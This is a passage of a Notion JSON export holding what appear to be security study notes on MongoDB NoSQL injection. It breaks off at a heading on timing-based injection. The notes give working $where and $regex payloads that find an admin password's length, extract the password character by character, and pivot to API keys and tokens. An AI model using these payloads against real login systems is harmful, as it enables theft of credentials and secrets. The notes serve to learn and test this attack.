Response:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8070-b700-e563529a52a8","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ab-8841-ec5a799c6570"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If response changes compared to wrong password → ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If response changes compared to wrong password → ","href":null},{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null},{"type":"text","text":{"content":" is processed → proceed to extraction.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" is processed → proceed to extraction.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-8069-91a7-d4eec2199ff2","parent":{"type":"block_id","block_id":"251dc9c5-3059-805d-9864-f5280c0952e5"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:37:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 4 – Determine password length (using ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 4 – Determine password length (using ","href":null},{"type":"text","text":{"content":".length","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":".length","href":null},{"type":"text","text":{"content":" or regex patterns).","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" or regex patterns).","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-804c-b827-dc31c5f5d701","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" Know how many characters to brute force.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Know how many characters to brute force.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8002-ab44-c13227980560","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If JavaScript allowed:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If JavaScript allowed:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80a0-afc0-cda024741be6","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"administrator\",\"$where\":\"this.password.length<15\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"administrator\",\"$where\":\"this.password.length<15\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-8087-8d5f-d5f45f62d018","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Full Query:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Full Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8017-9958-ecaccf6a0f1e","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"db.users.find({\n \"username\":\"administrator\",\n \"$where\":\"this.password.length<15\"\n})","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"db.users.find({\n \"username\":\"administrator\",\n \"$where\":\"this.password.length<15\"\n})","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8058-af21-eceb5e0fdb0d","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Expected Response:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Expected Response:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-808f-a4dd-e6f967409337","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"True → password length < 15.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"True → password length < 15.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8010-ae65-db39959c122d","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"False → test higher numbers. Use binary search to speed up.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"False → test higher numbers. Use binary search to speed up.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8055-a5b0-fe1d4ea64842","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If only $regex allowed:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If only $regex allowed:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8064-bf84-dd345190c1f3","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"You can indirectly test by appending ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"You can indirectly test by appending ","href":null},{"type":"text","text":{"content":"^.{10}$","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"^.{10}$","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"^.{15}$","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"^.{15}$","href":null},{"type":"text","text":{"content":", etc.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", etc.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8072-a95d-d994e7e1f4ee","parent":{"type":"block_id","block_id":"251dc9c5-3059-8069-91a7-d4eec2199ff2"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Match succeeds only if password is exactly that length.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Match succeeds only if password is exactly that length.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e","parent":{"type":"block_id","block_id":"251dc9c5-3059-805d-9864-f5280c0952e5"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:38:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 5 – Extract sensitive data character by character → using ","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 5 – Extract sensitive data character by character → using ","href":null},{"type":"text","text":{"content":"$$regex","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$regex","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8008-b0b9-df2b8cffdd80","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" Confirm password contents without JavaScript execution.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Confirm password contents without JavaScript execution.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80c3-85cd-dd70c7901b7f","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:39:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"5.1 Test first character:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"5.1 Test first character:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80dd-a71f-c1aedc4eda10","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Payload:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Payload:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80cd-b85b-d7109e276dc0","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\":\"admin\",\"password\":{\"$regex\":\"^a.*\"}}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\":\"admin\",\"password\":{\"$regex\":\"^a.*\"}}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-80e9-ae3b-fcbf8a49f39d","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Full Query:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Full Query:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-800d-affa-d488296c7ed9","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"db.users.find({\n \"username\":\"admin\",\n \"password\": { \"$regex\": \"^a.*\" }\n})","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"db.users.find({\n \"username\":\"admin\",\n \"password\": { \"$regex\": \"^a.*\" }\n})","href":null}],"language":"javascript"},"archived":false},{"object":"block","id":"251dc9c5-3059-8042-8f63-e316edec1aaa","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Expected Response:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Expected Response:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-803b-b783-e0f52da67349","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If response normal → first character is ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If response normal → first character is ","href":null},{"type":"text","text":{"content":"a","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"a","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8070-8770-d2a8b033d1cc","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If not → try ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If not → try ","href":null},{"type":"text","text":{"content":"b","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"b","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"c","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"c","href":null},{"type":"text","text":{"content":", … until correct.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", … until correct.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80d9-aec1-df20a62730c8","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:39:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"5.2 Move through indexes:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"5.2 Move through indexes:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80c8-8eb3-cd67c7ace13c","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Second character: ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Second character: ","href":null},{"type":"text","text":{"content":"^pa.*","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"^pa.*","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-800e-9026-d3bed0d3b1d3","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Third character: ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Third character: ","href":null},{"type":"text","text":{"content":"^pas.*","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"^pas.*","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80f5-b642-fe43258655f6","parent":{"type":"block_id","block_id":"251dc9c5-3059-8018-94ea-e85cf2aa3c9e"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:35:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Build full password sequentially.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Build full password sequentially.","href":null}],"color":"default"},"archived":false}]},{"object":"block","id":"251dc9c5-3059-8014-908a-f25d22bdcf80","parent":{"type":"block_id","block_id":"251dc9c5-3059-805d-9864-f5280c0952e5"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:37:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Step 6 – Repeat for other fields.","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 6 – Repeat for other fields.","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8079-8a03-e87d1adef1cd","parent":{"type":"block_id","block_id":"251dc9c5-3059-8014-908a-f25d22bdcf80"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Purpose:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Purpose:","href":null},{"type":"text","text":{"content":" Once password is known, pivot to sensitive fields like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" Once password is known, pivot to sensitive fields like ","href":null},{"type":"text","text":{"content":"email","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"email","href":null},{"type":"text","text":{"content":", ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", ","href":null},{"type":"text","text":{"content":"apikey","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"apikey","href":null},{"type":"text","text":{"content":", or ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", or ","href":null},{"type":"text","text":{"content":"token","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"token","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8018-828f-ed79b1e767a1","parent":{"type":"block_id","block_id":"251dc9c5-3059-8014-908a-f25d22bdcf80"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"For JavaScript injection:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"For JavaScript injection:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80c7-a3a8-e262113312e9","parent":{"type":"block_id","block_id":"251dc9c5-3059-8014-908a-f25d22bdcf80"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\":\"this.token[0]=='a'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\":\"this.token[0]=='a'\"}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"251dc9c5-3059-80b3-a678-c9f12d2cb7bd","parent":{"type":"block_id","block_id":"251dc9c5-3059-8014-908a-f25d22bdcf80"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"For $regex injection:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"For $regex injection:","href":null}],"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80b7-9486-db50d441ba2b","parent":{"type":"block_id","block_id":"251dc9c5-3059-8014-908a-f25d22bdcf80"},"created_time":"2025-08-16T13:32:00.000Z","last_edited_time":"2025-08-16T13:34:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"token\":{\"$regex\":\"^a.*\"}}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"token\":{\"$regex\":\"^a.*\"}}","href":null}],"language":"json"},"archived":false}]}]},{"object":"block","id":"254dc9c5-3059-802e-ac4b-fb5179109d07","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-19T07:55:00.000Z","last_edited_time":"2025-08-19T07:57:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Timing based injection","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Timing based 